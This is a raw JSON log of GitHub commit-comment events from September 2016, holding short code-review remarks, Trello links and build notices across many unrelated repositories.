{"id":"4519659125","type":"CommitCommentEvent","actor":{"login":"seeyouo"},"repo":{"name":"seeyouo/-"},"payload":{"comment":{"id":18906673,"position":null,"line":null,"path":null,"commit_id":"44967ea3b82f743b317266d54f81598a863c23b5","created_at":"2016-09-06T07:26:40Z","updated_at":"2016-09-06T07:26:40Z","body":"p"}},"created_at":"2016-09-06T07:26:40Z"}
{"id":"4519663389","type":"CommitCommentEvent","actor":{"login":"dinzone"},"repo":{"name":"linnovate/replay-common"},"payload":{"comment":{"id":18906691,"position":6,"line":16,"path":"replay-schemas/Video.js","commit_id":"56df70d73dff7e2d30b7ef66ada69a502b311351","created_at":"2016-09-06T07:27:49Z","updated_at":"2016-09-06T07:27:49Z","body":"*default"}},"created_at":"2016-09-06T07:27:49Z"}
{"id":"4519665650","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906695,"position":62,"line":59,"path":"index.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:28:24Z","updated_at":"2016-09-06T07:28:24Z","body":"I generally like the look of these routes a lot. They just do the stuff they are supposed to do - they extract parameters from the request, pass them to something else that knows what to do with them, sets cookies, and sends the response."}},"created_at":"2016-09-06T07:28:24Z"}
{"id":"4519669456","type":"CommitCommentEvent","actor":{"login":"mathiasbynens"},"repo":{"name":"leobalter/proposal-setmap-offrom"},"payload":{"comment":{"id":18906704,"position":4,"line":4,"path":"src/spec.html","commit_id":"2392c51c39d8d6c6edf558ce5968bddaf3fa3dd6","created_at":"2016-09-06T07:29:25Z","updated_at":"2016-09-06T07:29:25Z","body":"This line can be removed."}},"created_at":"2016-09-06T07:29:25Z"}
{"id":"4519671782","type":"CommitCommentEvent","actor":{"login":"ewedel"},"repo":{"name":"ewedel/pebble-sunclock"},"payload":{"comment":{"id":18906709,"position":null,"line":null,"path":null,"commit_id":"ec1a34366fbfec64d31e08b7658dad9ce0ea89d7","created_at":"2016-09-06T07:30:02Z","updated_at":"2016-09-06T07:30:02Z","body":"Hi again @antpovzner. Afraid various non-Pebble issues ran me out of time this weekend, sorry. Don't yet know the scope of the Sunclock classic fix, so have taken your suggestion and posted 3.3 to\r\n\r\nhttps://github.com/ewedel/pebble-sunclock/tree/master/old-builds\r\n\r\nThe README.md in that directory provides further information.\r\n\r\nregards, Eric"}},"created_at":"2016-09-06T07:30:02Z"}
{"id":"4519672226","type":"CommitCommentEvent","actor":{"login":"Kali-"},"repo":{"name":"sonyxperiadev/device-sony-karin_windy"},"payload":{"comment":{"id":18906710,"position":null,"line":null,"path":null,"commit_id":"fb2c3713c8887ce62c1c019045712ab858555438","created_at":"2016-09-06T07:30:11Z","updated_at":"2016-09-06T07:30:11Z","body":"just tested and it works :)"}},"created_at":"2016-09-06T07:30:11Z"}
{"id":"4519673563","type":"CommitCommentEvent","actor":{"login":"liam-b"},"repo":{"name":"liam-b/behavior-tree"},"payload":{"comment":{"id":18906714,"position":null,"line":null,"path":null,"commit_id":"5bd2b95f02ae1088a6e9ef958309efd7a8047485","created_at":"2016-09-06T07:30:27Z","updated_at":"2016-09-06T07:30:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HMIBdZA8&#x2F;10-remove-operator-constant-now-you-can-just-use-a-number\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Remove operator.constant, now you can just use a number</a>"}},"created_at":"2016-09-06T07:30:27Z"}
{"id":"4519674665","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18906720,"position":16,"line":332,"path":"arch/arm/boot/dts/qcom/msm8956.dtsi","commit_id":"6a85d83174b24f57b022d0c7c674cfc0367ab76d","created_at":"2016-09-06T07:30:45Z","updated_at":"2016-09-06T07:30:45Z","body":"< 1843200000 **7**>; and not < 1843200000 **8**>;?"}},"created_at":"2016-09-06T07:30:45Z"}
{"id":"4519675370","type":"CommitCommentEvent","actor":{"login":"liam-b"},"repo":{"name":"liam-b/behavior-tree"},"payload":{"comment":{"id":18906722,"position":null,"line":null,"path":null,"commit_id":"5bd2b95f02ae1088a6e9ef958309efd7a8047485","created_at":"2016-09-06T07:30:56Z","updated_at":"2016-09-06T07:30:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XZr6RYkh&#x2F;11-how-the-tree-actions-can-change-and-update-the-creatures-position\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> How the tree.actions can change and update the creatures position</a>"}},"created_at":"2016-09-06T07:30:56Z"}
{"id":"4519682877","type":"CommitCommentEvent","actor":{"login":"PeterEmil"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18906733,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T07:32:50Z","updated_at":"2016-09-06T07:32:50Z","body":"I second @olleharstedt: the noscript-tag works like a charm. No css overrides needed, every template can have its own styling and the warning is only seen when javascript is disabled. We use it in tfr-base as well."}},"created_at":"2016-09-06T07:32:50Z"}
{"id":"4519683432","type":"CommitCommentEvent","actor":{"login":"hrmoller"},"repo":{"name":"DBCDK/biblo"},"payload":{"comment":{"id":18906735,"position":8,"line":288,"path":"src/server/routes/group.routes.js","commit_id":"e3501549b02af97dbfaea3d6bbe5a19176b22aed","created_at":"2016-09-06T07:32:59Z","updated_at":"2016-09-06T07:32:59Z","body":"https://github.com/DBCDK/biblo/pull/312"}},"created_at":"2016-09-06T07:32:59Z"}
{"id":"4519683581","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906736,"position":47,"line":44,"path":"index.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:33:01Z","updated_at":"2016-09-06T07:33:01Z","body":"Line breaks and indentation would be helpful here!"}},"created_at":"2016-09-06T07:33:01Z"}
{"id":"4519684390","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"andanteyk/dockpanelsuite"},"payload":{"comment":{"id":18906737,"position":null,"line":null,"path":null,"commit_id":"9e8847b23d91a5ee194700b71bf36cee47f9cb49","created_at":"2016-09-06T07:33:15Z","updated_at":"2016-09-06T07:33:15Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/403"}},"created_at":"2016-09-06T07:33:15Z"}
{"id":"4519686481","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"andanteyk/dockpanelsuite"},"payload":{"comment":{"id":18906739,"position":null,"line":null,"path":null,"commit_id":"8f3ae9382a45d69ef04e18bf2c71ac456ae14bad","created_at":"2016-09-06T07:33:46Z","updated_at":"2016-09-06T07:33:46Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/403"}},"created_at":"2016-09-06T07:33:46Z"}
{"id":"4519687446","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"realm/realm-java"},"payload":{"comment":{"id":18906742,"position":21,"line":199,"path":"CONTRIBUTING.md","commit_id":"71691b35464a14a277be1f793f9a6be60ecd0d7c","created_at":"2016-09-06T07:34:01Z","updated_at":"2016-09-06T07:34:01Z","body":"Perhaps something along these lines...?\r\n\r\n> Minor changes (e.g. to documentation, tests, and the build system) may not affect end users but should still be merged to `releases` to avoid diverging too far from `master` and to reduce the likelihood of merge conflicts."}},"created_at":"2016-09-06T07:34:01Z"}
{"id":"4519689889","type":"CommitCommentEvent","actor":{"login":"meatballs"},"repo":{"name":"meatballs/xontrib-thefuck"},"payload":{"comment":{"id":18906746,"position":null,"line":null,"path":null,"commit_id":"8a929963884888270a5774afa8b1e1060a20d50e","created_at":"2016-09-06T07:34:39Z","updated_at":"2016-09-06T07:34:39Z","body":"It didn't work using ```__xonsh_history__[-1]``` That got passed into ```evalx``` as a string rather than being evaluated first.\r\n\r\nWhen I replaced it with the callable, it worked fine."}},"created_at":"2016-09-06T07:34:39Z"}
{"id":"4519689960","type":"CommitCommentEvent","actor":{"login":"championheng"},"repo":{"name":"championheng/linux-Actual-programming"},"payload":{"comment":{"id":18906747,"position":null,"line":null,"path":null,"commit_id":"d15294e7fd11db7e6abd2f46779f8a5c488fe0cd","created_at":"2016-09-06T07:34:40Z","updated_at":"2016-09-06T07:34:40Z","body":"del"}},"created_at":"2016-09-06T07:34:40Z"}
{"id":"4519691486","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18906752,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-06T07:35:05Z","updated_at":"2016-09-06T07:35:05Z","body":"> And as for operating systems usage, there are 5x times more XP and Vista stations that Linux ones. =/\r\nhttps://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0\r\n\r\nI appreciated your research. But I must point out, in that page, XP counts for ``9.36%``, and Vista only counts for ``1.05%``, less than a half of Linux. Remember XP is not supported by Npcap driver in any way. We are talking about Vista."}},"created_at":"2016-09-06T07:35:05Z"}
{"id":"4519691569","type":"CommitCommentEvent","actor":{"login":"bmadhavan"},"repo":{"name":"bmadhavan/main_code_rep"},"payload":{"comment":{"id":18906754,"position":null,"line":null,"path":null,"commit_id":"97ba49ff2dd851fec09e5a35f901e9ab3c4532dc","created_at":"2016-09-06T07:35:06Z","updated_at":"2016-09-06T07:35:06Z","body":"O(nlogn) sorting algos"}},"created_at":"2016-09-06T07:35:06Z"}
{"id":"4519691594","type":"CommitCommentEvent","actor":{"login":"leggetter"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18906755,"position":16,"line":16,"path":"src/Jwt.js","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-06T07:35:07Z","updated_at":"2016-09-06T07:35:07Z","body":"Ok, so there are two types of format:\r\n\r\n1. The one the library API accepts which should probably be language independent\r\n2. The format that the REST API or JWT standard expects\r\n\r\nFor 2. I'm assuming we should just reference the correct documents somewhere?\r\n\r\nWhen I wrote this I was actually asking what format the `iat` should be in from a [JWT standard](https://tools.ietf.org/html/rfc7519#section-4.1.6) point of view. I see it should be a [NumericDate](https://tools.ietf.org/html/rfc7519#page-6) (\"Seconds Since the Epoch\")."}},"created_at":"2016-09-06T07:35:07Z"}
{"id":"4519694417","type":"CommitCommentEvent","actor":{"login":"meatballs"},"repo":{"name":"meatballs/xontrib-thefuck"},"payload":{"comment":{"id":18906763,"position":1,"line":1,"path":"xontrib/thefuck.py","commit_id":"f17c43ebadf324fc02cd4cc0e6598095521090ea","created_at":"2016-09-06T07:35:48Z","updated_at":"2016-09-06T07:35:48Z","body":"Yep - it was in there to help with linting/code completion/lookup etc. whilst writing it. I should have got rid of it before release."}},"created_at":"2016-09-06T07:35:48Z"}
{"id":"4519695628","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18906766,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-06T07:36:09Z","updated_at":"2016-09-06T07:36:09Z","body":"@magnumripper just add a comment to racf format (and other formats with similar errors) that any new formats derived from this format shouldn't repeat that error."}},"created_at":"2016-09-06T07:36:09Z"}
{"id":"4519696252","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"SergioDDL/ProgrammingAssignment2"},"payload":{"comment":{"id":18906769,"position":null,"line":null,"path":null,"commit_id":"05bf4b3c78e2c1d679f0c94ae0431a281a9a137d","created_at":"2016-09-06T07:36:18Z","updated_at":"2016-09-06T07:36:18Z","body":"The procedure is too tedious to submit assignment.It has lot of dependencies."}},"created_at":"2016-09-06T07:36:18Z"}
{"id":"4519696908","type":"CommitCommentEvent","actor":{"login":"Aolish333"},"repo":{"name":"Aolish333/Aolish333.github.io"},"payload":{"comment":{"id":18906771,"position":null,"line":null,"path":null,"commit_id":"dcb2eef6f77076f7c861850cb38eb010352aff27","created_at":"2016-09-06T07:36:28Z","updated_at":"2016-09-06T07:36:28Z","body":"1"}},"created_at":"2016-09-06T07:36:28Z"}
{"id":"4519699219","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18906775,"position":5,"line":40,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/views/RemoteInputHelperView.java","commit_id":"20c5d279685073999d08617f5208ba142cdb1d04","created_at":"2016-09-06T07:37:01Z","updated_at":"2016-09-06T07:37:01Z","body":"It's still enabled. I don't know if it was intended, but it will be disabed in the official release. "}},"created_at":"2016-09-06T07:37:01Z"}
{"id":"4519699409","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906777,"position":47,"line":44,"path":"index.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:37:05Z","updated_at":"2016-09-06T07:37:05Z","body":"Is this just to make arrays contain unique items? I wonder if it would be better to do that elsewhere.\r\n\r\nBTW, you could also get only unique value by doing a query with `SELECT DISTINCT` but that would have to be a separate and additional query. I would probably get it from the results of the query to get all users, as you are doing."}},"created_at":"2016-09-06T07:37:05Z"}
{"id":"4519699538","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18906779,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-06T07:37:07Z","updated_at":"2016-09-06T07:37:07Z","body":"As I said, the only reason I changed my first {@code} based fix is doclint complaining about it. If you find a version that work with {@code} feel free to put it back."}},"created_at":"2016-09-06T07:37:07Z"}
{"id":"4519702299","type":"CommitCommentEvent","actor":{"login":"Drmadhu"},"repo":{"name":"SergioDDL/ProgrammingAssignment2"},"payload":{"comment":{"id":18906788,"position":21,"line":103,"path":"README.md","commit_id":"9b22d21e3671f46bf535624bbb769786840d05ba","created_at":"2016-09-06T07:37:50Z","updated_at":"2016-09-06T07:37:50Z","body":"Procedure is very clear."}},"created_at":"2016-09-06T07:37:50Z"}
{"id":"4519710792","type":"CommitCommentEvent","actor":{"login":"sielay"},"repo":{"name":"getlackey/lackey-cms"},"payload":{"comment":{"id":18906797,"position":19,"line":134,"path":"modules/cms/server/lib/dust/media.js","commit_id":"46ce631082f3a1d21d9aa8749dac51320301c92c","created_at":"2016-09-06T07:40:04Z","updated_at":"2016-09-06T07:40:04Z","body":"@melono6 how this differ from first `else if` above?"}},"created_at":"2016-09-06T07:40:04Z"}
{"id":"4519712058","type":"CommitCommentEvent","actor":{"login":"notspiff"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18906804,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-06T07:40:22Z","updated_at":"2016-09-06T07:40:22Z","body":"grgl, it's the stupid pkg-config handler in cmake.\r\n\r\ntry adding\r\n```cmake\r\nlist(APPEND RTMP_INCLUDE_DIRS ${RTMP_INCLUDEDIR})\r\n```\r\ninside the pkg-config block in FindRTMP.cmake."}},"created_at":"2016-09-06T07:40:22Z"}
{"id":"4519712073","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906805,"position":72,"line":69,"path":"index.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:40:22Z","updated_at":"2016-09-06T07:40:22Z","body":"We should make sure we send a response even if there is an error. `res.sendStatus(500);` would be sufficient."}},"created_at":"2016-09-06T07:40:22Z"}
{"id":"4519719891","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18906817,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-06T07:42:22Z","updated_at":"2016-09-06T07:42:22Z","body":"@tmortagne  I committed a version that worked for me yesterday. Just checked CI and it seems happy too."}},"created_at":"2016-09-06T07:42:22Z"}
{"id":"4519720585","type":"CommitCommentEvent","actor":{"login":"Aolish333"},"repo":{"name":"Aolish333/Aolish333.github.io"},"payload":{"comment":{"id":18906818,"position":null,"line":null,"path":null,"commit_id":"dcb2eef6f77076f7c861850cb38eb010352aff27","created_at":"2016-09-06T07:42:35Z","updated_at":"2016-09-06T07:42:35Z","body":"1"}},"created_at":"2016-09-06T07:42:35Z"}
{"id":"4519723882","type":"CommitCommentEvent","actor":{"login":"takuyawakahara"},"repo":{"name":"takuyawakahara/intern_task"},"payload":{"comment":{"id":18906834,"position":null,"line":null,"path":null,"commit_id":"c823891dff0ed00958cb15ffb6743af5e5ca8e22","created_at":"2016-09-06T07:43:27Z","updated_at":"2016-09-06T07:43:27Z","body":"aaaaaaaa"}},"created_at":"2016-09-06T07:43:27Z"}
{"id":"4519724240","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18906835,"position":null,"line":null,"path":null,"commit_id":"4b85abbc2a1a8dd7d5802b20839605a20bdcec02","created_at":"2016-09-06T07:43:32Z","updated_at":"2016-09-06T07:43:32Z","body":"Indeed, I thought it would work but the behavior is undefined, will use the original formula!"}},"created_at":"2016-09-06T07:43:32Z"}
{"id":"4519724696","type":"CommitCommentEvent","actor":{"login":"Aolish333"},"repo":{"name":"Aolish333/Aolish333.github.io"},"payload":{"comment":{"id":18906840,"position":null,"line":null,"path":null,"commit_id":"cec3d9b758a4a2da636224c363f41ac3648d47cb","created_at":"2016-09-06T07:43:39Z","updated_at":"2016-09-06T07:43:39Z","body":"2"}},"created_at":"2016-09-06T07:43:39Z"}
{"id":"4519727965","type":"CommitCommentEvent","actor":{"login":"QuadPiece"},"repo":{"name":"thehowl/dynamic-e"},"payload":{"comment":{"id":18906845,"position":null,"line":null,"path":null,"commit_id":"1c35c0cfdc7ce73a23010a0637cc76e4bf6081b3","created_at":"2016-09-06T07:44:29Z","updated_at":"2016-09-06T07:44:29Z","body":"this is why you don't use apache"}},"created_at":"2016-09-06T07:44:29Z"}
{"id":"4519730213","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906850,"position":166,"line":166,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T07:45:02Z","updated_at":"2016-09-06T07:45:02Z","body":"var keyArr = $$map(content, function(value){\r\n      return value[key];\r\n})"}},"created_at":"2016-09-06T07:45:02Z"}
{"id":"4519732766","type":"CommitCommentEvent","actor":{"login":"coolo"},"repo":{"name":"lydiapintscher/20-years-of-KDE"},"payload":{"comment":{"id":18906856,"position":null,"line":null,"path":null,"commit_id":"8f9a67878473efb73996c32ba8aa642720eed9b1","created_at":"2016-09-06T07:45:40Z","updated_at":"2016-09-06T07:45:40Z","body":"DUDE! 2006 was FIFA World Cup not some random euro championship :)\r\n\r\nhttps://en.wikipedia.org/wiki/2006_FIFA_World_Cup"}},"created_at":"2016-09-06T07:45:40Z"}
{"id":"4519733496","type":"CommitCommentEvent","actor":{"login":"61Stan"},"repo":{"name":"eurosecom/projekt1"},"payload":{"comment":{"id":18906861,"position":null,"line":null,"path":null,"commit_id":"5edf276bde9a43d8ce612638a0cfff3e85583e34","created_at":"2016-09-06T07:45:52Z","updated_at":"2016-09-06T07:45:52Z","body":"Todo\r\n- vyrobiť .jpg podklad 2.strany"}},"created_at":"2016-09-06T07:45:52Z"}
{"id":"4519736862","type":"CommitCommentEvent","actor":{"login":"Antamonova"},"repo":{"name":"Antamonova/Homework_1"},"payload":{"comment":{"id":18906876,"position":null,"line":null,"path":null,"commit_id":"d25146d7fc67e7e280418814ae77ef271022790c","created_at":"2016-09-06T07:46:45Z","updated_at":"2016-09-06T07:46:45Z","body":"[Баги сайта Ак.Сухорукова.txt](https://github.com/Antamonova/Homework_1/files/456179/default.txt)\r\n[Почта РФ.txt](https://github.com/Antamonova/Homework_1/files/456180/default.txt)\r\n[Система Доменных Имен.txt](https://github.com/Antamonova/Homework_1/files/456181/default.txt)\r\n[Тестирование яйца.xlsx](https://github.com/Antamonova/Homework_1/files/456182/default.xlsx)\r\n"}},"created_at":"2016-09-06T07:46:45Z"}
{"id":"4519740206","type":"CommitCommentEvent","actor":{"login":"maxime-esa"},"repo":{"name":"esa/opengeode"},"payload":{"comment":{"id":18906884,"position":null,"line":null,"path":null,"commit_id":"0bcd6c9401f1d84811e383c8d38328a4d5b75e94","created_at":"2016-09-06T07:47:39Z","updated_at":"2016-09-06T07:47:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;A0mx1aIw&#x2F;286-refactor-function-to-fix-casing\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Refactor function to fix casing</a>"}},"created_at":"2016-09-06T07:47:39Z"}
{"id":"4519741468","type":"CommitCommentEvent","actor":{"login":"ilaripih"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":18906886,"position":4,"line":275,"path":"projects/gui/src/mainwindow.cpp","commit_id":"65506e2f2a1c26b64e88157a785c8342a09ce040","created_at":"2016-09-06T07:47:58Z","updated_at":"2016-09-06T07:47:58Z","body":"I saw this comment too late; I moved both Game Wall and Game Database to Tools menu. I'll create an issue about renaming Game Wall to Active Games and moving it back to Window menu."}},"created_at":"2016-09-06T07:47:58Z"}
{"id":"4519742780","type":"CommitCommentEvent","actor":{"login":"lukaszolszewski"},"repo":{"name":"lukaszolszewski/devoxx4kids2016"},"payload":{"comment":{"id":18906890,"position":null,"line":null,"path":null,"commit_id":"ecfa0f318462f42ecd83ec5c6dd30ccb1fdde42f","created_at":"2016-09-06T07:48:19Z","updated_at":"2016-09-06T07:48:19Z","body":"cool :)"}},"created_at":"2016-09-06T07:48:19Z"}
{"id":"4519748409","type":"CommitCommentEvent","actor":{"login":"maxime-esa"},"repo":{"name":"esa/opengeode"},"payload":{"comment":{"id":18906910,"position":null,"line":null,"path":null,"commit_id":"7944a977e251eb3606cd5c07e29694487b6a42ca","created_at":"2016-09-06T07:49:48Z","updated_at":"2016-09-06T07:49:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;U8JW73J9&#x2F;282-if-search-pattern-is-an-exception-is-generated\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> if search pattern is &quot;*&quot; an exception is generated</a>"}},"created_at":"2016-09-06T07:49:48Z"}
{"id":"4519749101","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906917,"position":43,"line":43,"path":"src/Module3/Homework/Task4/User.java","commit_id":"6671bbb97c44e6baa8da26445f459f8813202104","created_at":"2016-09-06T07:49:59Z","updated_at":"2016-09-06T07:49:59Z","body":"Зачем в этом методе столько межстрочных пробелов"}},"created_at":"2016-09-06T07:49:59Z"}
{"id":"4519750784","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18906922,"position":null,"line":null,"path":null,"commit_id":"9109b36e0de674da39d648efedf531f82f0f9b17","created_at":"2016-09-06T07:50:26Z","updated_at":"2016-09-06T07:50:26Z","body":"TeamCity ReOpenLDAP :: devel [Build 307](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2777&buildTypeId=ReOpenLDAP_Devel&guest=1) outcome was **UNKNOWN**\nSummary: Canceled (Tests passed: 185; Round 1 of 1, DQD-KFA: Starting test060-mt-hot for hdb/DQD-KFA...) Build time: 02:26:18"}},"created_at":"2016-09-06T07:50:26Z"}
{"id":"4519750786","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18906923,"position":null,"line":null,"path":null,"commit_id":"01b606df5e19f4892ef02e94e19b073737c4d07d","created_at":"2016-09-06T07:50:26Z","updated_at":"2016-09-06T07:50:26Z","body":"TeamCity ReOpenLDAP :: devel [Build 307](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2777&buildTypeId=ReOpenLDAP_Devel&guest=1) outcome was **UNKNOWN**\nSummary: Canceled (Tests passed: 185; Round 1 of 1, DQD-KFA: Starting test060-mt-hot for hdb/DQD-KFA...) Build time: 02:26:18"}},"created_at":"2016-09-06T07:50:26Z"}
{"id":"4519751264","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906924,"position":29,"line":29,"path":"src/Module3/Homework/Task4/User.java","commit_id":"6671bbb97c44e6baa8da26445f459f8813202104","created_at":"2016-09-06T07:50:32Z","updated_at":"2016-09-06T07:50:32Z","body":"межстрочные пробелы"}},"created_at":"2016-09-06T07:50:32Z"}
{"id":"4519754247","type":"CommitCommentEvent","actor":{"login":"artkoval4"},"repo":{"name":"andrii142/JavaCourse"},"payload":{"comment":{"id":18906932,"position":28,"line":27,"path":"src/module4/homework/BankSystemImpl.java","commit_id":"7ea887d3ab3658297aa459a0519c9b3d96d2927c","created_at":"2016-09-06T07:51:18Z","updated_at":"2016-09-06T07:51:18Z","body":"is it getCommission?"}},"created_at":"2016-09-06T07:51:18Z"}
{"id":"4519754595","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906933,"position":254,"line":254,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T07:51:24Z","updated_at":"2016-09-06T07:51:24Z","body":"这个页面有四个选项的list需要请求加载，所以把每个请求的接口、参数和处理方法定义到一个options里面，传给setList方法让它内部自己处理相同部分"}},"created_at":"2016-09-06T07:51:24Z"}
{"id":"4519757348","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906937,"position":48,"line":48,"path":"src/Module3/Homework/Task4/User.java","commit_id":"6671bbb97c44e6baa8da26445f459f8813202104","created_at":"2016-09-06T07:52:09Z","updated_at":"2016-09-06T07:52:09Z","body":"межстрочные пробелы и этот метод ничего не должен возвращать"}},"created_at":"2016-09-06T07:52:09Z"}
{"id":"4519760430","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906940,"position":29,"line":29,"path":"src/Module3/Homework/Task4/User.java","commit_id":"6671bbb97c44e6baa8da26445f459f8813202104","created_at":"2016-09-06T07:52:51Z","updated_at":"2016-09-06T07:52:51Z","body":"этот метод ничего не должен возвращать"}},"created_at":"2016-09-06T07:52:51Z"}
{"id":"4519762352","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":18906943,"position":7,"line":7,"path":"createMasksForFilteringData.py","commit_id":"61b85f1b114579c5fda1c85e84ad9de18dbc13ba","created_at":"2016-09-06T07:53:20Z","updated_at":"2016-09-06T07:53:20Z","body":"If you are in Jupyter then use %pylab\r\n"}},"created_at":"2016-09-06T07:53:20Z"}
{"id":"4519764670","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906947,"position":272,"line":272,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T07:53:54Z","updated_at":"2016-09-06T07:53:54Z","body":"$$each是正确的写法，$$.each是jQuery直接调用了jQuery的方法，如果更换了底层框架，后者会出大问题。"}},"created_at":"2016-09-06T07:53:54Z"}
{"id":"4519764824","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906948,"position":33,"line":33,"path":"src/Module3/Homework/Task4/User.java","commit_id":"6671bbb97c44e6baa8da26445f459f8813202104","created_at":"2016-09-06T07:53:56Z","updated_at":"2016-09-06T07:53:56Z","body":"у нас фиксированная комиссия в 50 центов или у нас комиссия в процентах?"}},"created_at":"2016-09-06T07:53:56Z"}
{"id":"4519765243","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906949,"position":36,"line":36,"path":"src/Module3/Homework/Task4/User.java","commit_id":"6671bbb97c44e6baa8da26445f459f8813202104","created_at":"2016-09-06T07:54:02Z","updated_at":"2016-09-06T07:54:02Z","body":"у нас фиксированная комиссия в 50 центов или у нас комиссия в процентах?"}},"created_at":"2016-09-06T07:54:02Z"}
